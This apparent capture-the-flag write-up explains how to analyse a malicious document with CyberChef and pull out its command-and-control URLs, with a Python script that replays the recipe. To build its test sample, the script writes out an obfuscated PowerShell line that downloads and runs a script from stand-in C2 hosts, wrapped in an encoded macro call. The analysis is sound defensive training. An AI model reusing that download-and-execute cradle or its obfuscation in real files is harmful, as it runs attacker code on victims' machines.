07 Dec 2022
CyberChef Maldocs roasting on an open fire

Had to skip yesterday’s challenge and post, so they’re doubled today. I kept a simple question in the wings to keep the streak alive though. Glad for this one because I’m always looking for a fun reason to use CyberChef.
New acronym, C2 - Command and Control Infrastructure. Really digging the new(ish) wiki-type links in the tasks.
Extract strings - step 1 after loading the file: look for embedded domains. Set the character set to all printable characters and raise the minimum string length until only the information worth focusing on is shown.
Find/Replace - remove the extra repeated characters inserted as obfuscation. Among other things, this reveals a base64-encoded blob.
Drop bytes - start at 0 and increase the length until only the base64 is left.
From Base64 - then Decode text as UTF-16LE (1200), the encoding PowerShell’s -EncodedCommand expects.
Find/Replace - remove the repeated obfuscation characters again, this time from the decoded script.
Find/Replace - undo the simple substitution used to obfuscate the addresses.
Extract URLs - leave only the URLs.
Split - split the results on the delimiter that repeats between them, one URL per line.
Defang URL - rewrite the links (http to hxxp, dots to [.]) so they stay readable but can’t be clicked by accident.
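The same recipe as an added Python script, one function per CyberChef operation, so the steps can be replayed outside the browser. This is example code written for this post, not the challenge file and not CyberChef: the sample "maldoc", the two filler tokens, the {dot} substitution and the C2 hostnames are all constructed here so that the round trip can be checked end to end.

```python
from __future__ import annotations

import base64
import re

# Constructed sample (an assumption for this example, not the challenge file):
# a macro-style string carrying a base64 blob of a UTF-16LE PowerShell one-liner,
# with a filler token inserted between characters as cheap obfuscation.
OUTER_FILLER = "%^"   # filler in the document's macro string (constructed)
INNER_FILLER = "@@"   # filler that survives into the decoded script (constructed)
PS_SCRIPT = (
    "$u='ht@@tp://c2-primary{dot}example/payload.ps1';"
    "$v='http://c2-@@backup{dot}example/stage2.ps1';"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)


def build_sample_doc() -> bytes:
    """Wrap the encoded script in a VBA-like line surrounded by non-printable noise."""
    b64 = base64.b64encode(PS_SCRIPT.encode("utf-16-le")).decode("ascii")
    macro = 'sh.Run "powershell -enc ' + OUTER_FILLER.join(b64) + '"'
    noise = bytes(range(0x00, 0x20)) * 4          # control bytes: never "printable"
    return noise + macro.encode("ascii") + noise


# --- one function per CyberChef operation in the recipe ----------------------

def extract_strings(data: bytes, min_len: int = 8) -> list[str]:
    """Extract strings: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def strip_filler(s: str, filler: str) -> str:
    """Find/Replace: delete the repeated obfuscation token."""
    return s.replace(filler, "")


def isolate_base64(s: str) -> str:
    """Drop bytes: keep the longest base64-looking run (the manual 'drop until only base64' step)."""
    runs = re.findall(r"[A-Za-z0-9+/]{32,}={0,2}", s)
    if not runs:
        raise ValueError("no base64 run found")
    return max(runs, key=len)


def decode_powershell(b64: str) -> str:
    """From Base64 + Decode text UTF-16LE (1200): what powershell -enc expects."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate_addresses(s: str, table: dict[str, str] | None = None) -> str:
    """Find/Replace: undo the simple substitution on the addresses."""
    table = table or {"{dot}": "."}  # constructed obfuscation scheme
    for bad, good in table.items():
        s = s.replace(bad, good)
    return s


URL_RE = re.compile(r"https?://[^\s'\"();]+")


def extract_urls(s: str) -> list[str]:
    """Extract URLs + Split: one URL per list entry."""
    return URL_RE.findall(s)


def defang(url: str) -> str:
    """Defang URL: readable but not clickable (http -> hxxp, '.' -> '[.]')."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def run_recipe(doc: bytes) -> list[str]:
    """The whole recipe, in the order the post lists it."""
    candidate = max(extract_strings(doc, min_len=40), key=len)
    cleaned = strip_filler(candidate, OUTER_FILLER)
    script = decode_powershell(isolate_base64(cleaned))
    script = strip_filler(script, INNER_FILLER)
    script = deobfuscate_addresses(script)
    return [defang(u) for u in extract_urls(script)]


if __name__ == "__main__":
    for ioc in run_recipe(build_sample_doc()):
        print(ioc)
```

Running it prints the two defanged C2 URLs. The only judgement calls the script automates are the ones the recipe leaves to the analyst's eye: the minimum string length, and how far to drop bytes before the base64 starts (here, take the longest base64-looking run). On a real sample you would still inspect the intermediate output of each stage, because a filler token that happens to occur inside the base64 alphabet, or a second encoding layer, will silently break the decode.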
Gather information from the last task’s attached file.
All flags captured. I really like the focus on documentation and prepping things for documentation to hand on to the next team this year. Having had to dig through poor or missing documentation, this is a good sleight of hand to slip the training/expectation in to prevent poor documentation in the future.